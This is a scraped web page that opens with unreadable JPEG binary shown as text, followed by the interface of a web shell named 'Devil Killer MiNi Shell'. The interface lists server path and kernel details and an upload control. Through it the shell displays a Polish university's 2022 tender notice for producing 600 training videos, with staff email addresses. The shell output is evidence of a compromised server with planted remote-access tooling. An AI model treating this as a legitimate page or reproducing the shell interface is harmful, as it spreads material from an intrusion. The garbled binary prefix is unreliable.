JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220715/0025720001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja usługi nagrania i montażu filmów szkoleniowo-dydaktycznych dla Centrum e-Learningu Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001815</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Adama Mickiewicza 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rector@urk.edu.pl; maciej.mlynarczyk@urk.edu.pl; dzp@urk.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://urk.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja usługi nagrania i montażu filmów szkoleniowo-dydaktycznych dla Centrum e-Learningu Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-114e9729-03f4-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00257200</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00042271/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Realizacja usługi nagrania i montażu filmów szkoleniowo-dydaktycznych dla Centrum e-Learningu Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiot zamówienia finansowany jest w ramach Projektu pn. „Zrównoważony Rozwój Uczelni” o nr POWER.03.05.00-00-ZR50/18 (Zadanie nr 8) współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https:// platformazakupowa.pl/pn/urk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https:// platformazakupowa.pl/pn/urk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej zostały określone w Rozdziale VIII oraz Rozdziale XI Specyfikacji Warunków Zamówienia [SWZ].</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zostały zawarte w Rozdziale XIX Specyfikacji Warunków Zamówienia [SWZ].</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO zostały zawarte w Rozdziale XIX Specyfikacji Warunków Zamówienia [SWZ].</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-291-919/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest Realizacja usługi nagrania i montażu filmów szkoleniowo-dydaktycznych dla Centrum e-Learningu Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie z siedzibą pod adresem: 31-425 Kraków, al. 29 Listopada 46.<br/>2.	Wykonawca w ramach niniejszego zamówienia zobowiązany będzie zrealizować na rzecz Zamawiającego usługi nagrania i montażu maksymalnie 600 (słownie: sześciuset) filmów szkoleniowo-dydaktycznych związanych z zakresem działalności statutowej prowadzonej przez Uniwersytet Rolniczy im. Hugona Kołłątaja w Krakowie, zwanych w dalszej treści „filmami”.<br/>3.	Wykonawca zobowiązany będzie, również do opracowania maksymalnie 600 (słownie: sześciuset) autorskich skrótów promocyjno-informacyjnych, o których mowa w § 4 ust. 12 wzoru umowy / opz (Załącznik nr 1 do SWZ), zwany w dalszej treści „wzorem umowy / opz”, do każdych zrealizowanych filmów, o których mowa w pkt 2 niniejszego paragrafu. <br/>4.	Wykonawca zobowiązany będzie, również do opracowania 1 (słownie: jednej) autorskiej czołówki i tyłówki, która będzie umieszczana każdorazowo we wszystkich zmontowanych filmach, o której mowa w § 5 wzoru umowy / opz, zwanej w dalszej treści „czołówką/tyłówką”. <br/>5. 22.	Szczegółowy opis przedmiotu zamówienia [OPZ] oraz pozostałe warunki realizacji przedmiotu zamówienia, zostały zamieszczone we wzorze umowy (Załącznik nr 1 do SWZ), z którymi Wykonawca zobowiązany jest się zapoznać.<br/>6. Przedmiot zamówienia stanowi kompleksową realizację usługi nagrania i montażu 600 filmów szkoleniowo-dydaktycznych (wraz ze zrealizowaniem skrótów do tych filmów i opracowaniem autorskiej czołówki/tyłówki, o których mowa we wzorze umowy/opz) na rzecz jednego Zamawiającego. Podzielenie postępowania na części (zadania) groziłoby nadmiernymi trudnościami organizacyjnymi i logistycznymi oraz kosztami wykonania zamówienia, a także potrzebą skoordynowania działań różnych Wykonawców realizujących poszczególne części (zadania). W ocenie Zamawiającego jest to zamówienie specjalistyczne, które świadczyć mogą Wykonawcy posiadający odpowiednie przygotowanie merytoryczne, fachową wiedzę i doświadczenie z zakresu nagrywania i montażu filmów oraz zaplecze techniczne i potencjał kadrowy umożliwiające jednoczesne, realne, a zarazem rzetelne, świadczenie pełnego zakresu objętego niniejszym zamówieniem. Ze względu na swoją specyfikę, realizacja przedmiotu zamówienia składa się z różnych działań, które mogą być wykonywane jednocześnie w różnych miejscach (lokacjach) wskazanych przez Zamawiającego, dlatego też wydzielenie z niniejszego przedmiotu osobnych zadań, a co za tym idzie, ich realizacja przez różnych Wykonawców, mogłoby doprowadzić do chaosu organizacyjnego i niewykonania umowy w terminie, a przez to utratę dofinansowania ze środków zewnętrznych. Ponadto warunki realizacji niniejszego zamówienia nie wykluczają z udziału małych i średnich przedsiębiorców. Zamawiający ma na względzie zasadę optymalizacji kosztów oraz zasadę gospodarności przy wydatkowaniu środków publicznych. Powyższe uzasadnienie wpisuje się w przepis art. 25 ust. 2 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92111100-3 - Produkcja filmów instruktażowych oraz taśm wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">92111250-9 - Produkcja filmów informacyjnych</p> <p class="mb-0">92111210-7 - Produkcja filmów reklamowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które nie zostaną odrzucone oraz, gdy Wykonawca nie będzie podlegał wykluczeniu z postępowania.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował opisanymi poniżej kryteriami oceny ofert.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów, przyznanych zgodnie z powyższymi zasadami. Liczba punktów przyznana poszczególnym ofertom zostanie obliczona z dokładnością do dwóch miejsc po przecinku. W przypadku osiągnięcia jednakowej liczby punktów przez dwie lub więcej ofert, Zamawiający wybierze ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę o najniższej cenie. Jeżeli nie można dokonać wyboru oferty, ponieważ zostały złożone oferty o takiej<br/>samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty do złożenia w terminie określonym, ofert dodatkowych zawierających nową cenę.<br/>4. Oferta Wykonawcy może otrzymać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Portfolio filmowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	WYKAZ USŁUG - O udzielenie zamówienia publicznego mogą ubiegać się wszyscy Wykonawcy, którzy spełniają warunki udziału niniejszym postępowaniu – zgodnie z art. 112 ust. 2 pkt 4) ustawy Pzp, dotyczące Zdolności technicznej lub zawodowej – Zamawiający stawia warunek:<br/>1)	Wykonawca spełni warunek, jeżeli wykaże, że wykonał należycie w okresie ostatnich 3 lat, liczonych wstecz od dnia, w którym upływa termin składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie: <br/>a)	co najmniej trzy (3) usługi (umowy) polegające na produkcji filmów <br/>trwających min. 15 minut każdy o charakterze edukacyjnym / dydaktycznym / instruktażowym / naukowo-popularyzacyjnym, o wartości:<br/>- 2 usługi (umowy), na co najmniej 60 000 zł brutto każda;<br/>- 1 usługa (umowa), na co najmniej 100 000,00 zł brutto.<br/>2)	Zmawiający dokona oceny spełnienia tego warunku na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie „spełnia – nie spełnia”. <br/>3)	Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest złożyć „Wykaz usług” (Załącznik nr 8 do SWZ), wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, <br/>o których mowa są referencje, bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. <br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje, bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>4)	Przez „usługę” Zamawiający rozumie usługę, o której mowa w pkt 1) zrealizowaną jednorazowo lub sukcesywnie w ramach jednej umowy lub realizowaną obecnie <br/>z tym, że do dnia składania ofert w niniejszym postępowaniu zrealizowana część musi obejmować usługę o wartości, nie niższej, niż wskazana w pkt 1).<br/>5)	Zamawiający nie dopuszcza sumowania wartości kilku usług (umów) w celu osiągnięcia wartości minimalnej.<br/>6)	W przypadku złożenia przez Wykonawców dokumentów dotyczących wartości usług zawierających dane w innych walutach niż złoty (PLN), Zamawiający, jako kurs przeliczeniowy tej waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP) opublikowany na dzień daty publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeśli w dniu ogłoszenia nie była opublikowana tabela średnich kursów NBP, zastosowany zostanie kurs z ostatniej tabeli kursów średnich opublikowanej bezpośrednio przed dniem daty publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/>7)	W przypadku składania oferty wspólnej, spełnienie warunku udziału <br/>w postępowaniu powinien wykazać, co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie. Dokument potwierdzający składa, co najmniej jeden z nich, który ten warunek spełnia.<br/>8)	W celu wstępnego wykazania spełniania warunków udziału w postępowaniu, Wykonawca złoży Oświadczenie (wg wzoru stanowiącego Załącznik nr 3 do SWZ) na zasadach określonych w dalszej treści SWZ.<br/>9)	Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcie gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/>2.	WYKAZ OSÓB - O udzielenie zamówienia publicznego mogą ubiegać się wszyscy Wykonawcy, którzy spełniają warunki udziału niniejszym postępowaniu – zgodnie z art. 112 ust. 2 pkt 4) ustawy Pzp, dotyczące Zdolności technicznej lub zawodowej – Zamawiający stawia warunek:<br/>1)	Zamawiający wymaga, aby Wykonawca dysponował osobami zdolnymi do realizacji zamówienia, w szczególności:<br/>a)	Operator kamery – co najmniej 2 osoby z doświadczeniem w zakresie operatora kamery, wynikającym z pełnienia funkcji operatora kamery, który brał czynny udział w co najmniej trzech projektach związanych z przygotowaniem i realizacją minimum 15 – minutowych filmów (np. szkoleniowych, promocyjnych, edukacyjnych, instruktażowych, reportaży, relacji) w okresie ostatnich 3 lat przed upływem terminu składania ofert;<br/>b)	Lektor – co najmniej 1 osoba z doświadczeniem w pracy lektora, wynikającym z pełnienia funkcji lektora, w co najmniej trzech projektach związanych z przygotowaniem i realizacją filmów w okresie ostatnich 3 lat przed upływem terminu składania ofert;<br/>c)	Realizator post produkcji / montażysta – co najmniej 1 osoba <br/>z doświadczeniem w zakresie post produkcji / wykonanie montażu filmów, wynikającym z udziału w co najmniej trzech projektach związanych <br/>z przygotowaniem i realizacją minimum 15-minutowych filmów (np. szkoleniowych, promocyjnych, edukacyjnych, instruktażowych, reportaży, relacji) w okresie ostatnich 3 lat przed upływem terminu składania ofert;<br/>d)	Grafik i twórca animacji wideo/komputerowych – co najmniej 1 osoba <br/>z doświadczeniem w zakresie tworzenia grafiki i animacji komputerowej (w tym 3D) oraz efektów specjalnych w filmie, wynikającym z udziału w co najmniej trzech projektach związanych z przygotowaniem i realizacją filmów (np. szkoleniowych, promocyjnych, edukacyjnych, instruktażowych, reportaży, relacji) w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br/>2)	Przez „projekty”, o których mowa w ppkt 1) lit. a)-d) Zamawiający rozumie usługi, <br/>zrealizowane (zakończone) na podstawie zawartych umów i odebrane przez Zamawiających (podmioty / kontrahentów) do dnia terminu składania ofert <br/>w niniejszym postępowaniu.<br/>3)	Ze względu na zakres realizacji przedmiotu zamówienia (umowy) Zamawiający nie zezwala na łączenie kilku funkcji (operatora kamery, lektora, realizatora postprodukcji/montażysty, grafika i twórcy animacji wideo/komputerowych) przez jedną osobę. Wykonawca musi wykazać dla każdej z funkcji oddzielną osobę. <br/>4)	Na potwierdzenie spełnienia tego warunku Wykonawca złoży „Wykaz osób (Załącznik nr 9 do SWZ) skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami.<br/>5)	W przypadku składania oferty wspólnej, spełnienie warunku udziału <br/>w postępowaniu powinien wykazać, co najmniej jeden z Wykonawców wspólnie ubiegających się o zamówienie. Dokument potwierdzający składa, co najmniej jeden z nich, który spełnia ten warunek.<br/>6)	Zmawiający dokona oceny spełnienia tego warunku na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie „spełnia – nie spełnia”.<br/>7)	W przypadku, gdyby w trakcie realizacji zamówienia (umowy) doszło do zmiany osoby wykazanej w „Wykazie osób” i skierowanej do realizacji niniejszego zamówienia, Wykonawca zobowiązany jest niezwłocznie poinformować o tym fakcie Zamawiającego drogą elektroniczną wraz z przedstawieniem wykazu stanowiącym Załącznik nr 9 do SWZ nowej osoby skierowanej do realizacji zamówienia. Nowa osoba musi wykazać się doświadczeniem, nie gorszym, niż osoba pierwotnie skierowana do realizacji zamówienia.<br/>8)	Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcie gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/>ZE WZGLĘDU NA ILOŚĆ ZNAKÓW EDYTORSKICH W TYM MIEJSCU - SZCZEGÓŁOWE INFORMACJE ZNAJDUJĄ SIĘ W ROZDZIALE IV SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	„KRS lub CEiDG” - Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp oraz w zakresie art. 7 ust. 1 ustawy sankcyjnej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2)	„Grupa Kapitałowa” - Oświadczenie Wykonawcy, którego wzór stanowi Załącznik nr 7 do SWZ, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2021 r., poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>3) Zamawiający w celu potwierdzenia braku podstaw wykluczenia z postępowania na podstawie przesłanek określonych w art. 7 ust. 1 specustawy sankcyjnej, zastrzega, w toku prowadzonego postępowania, możliwość samodzielnego weryfikowania aktualności listy sankcyjnej, o której mowa w art. 2 pkt 1 ustawy sankcyjnej (dostęp pod adresem: https://www.gov.pl/web/mswia/lista-osob-i-podmiotow-objetych-sankcjami) a także weryfikacji w Centralnym Rejestrze Beneficjentów Rzeczywistych (dostęp pod adresem: https://crbr.podatki.gov.pl/adcrbr/#/wyszukaj).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	„Wykaz usług + Poświadczenia” – wzór wykazu stanowi Załącznik nr 8 do SWZ, w którym przedstawione będzie, 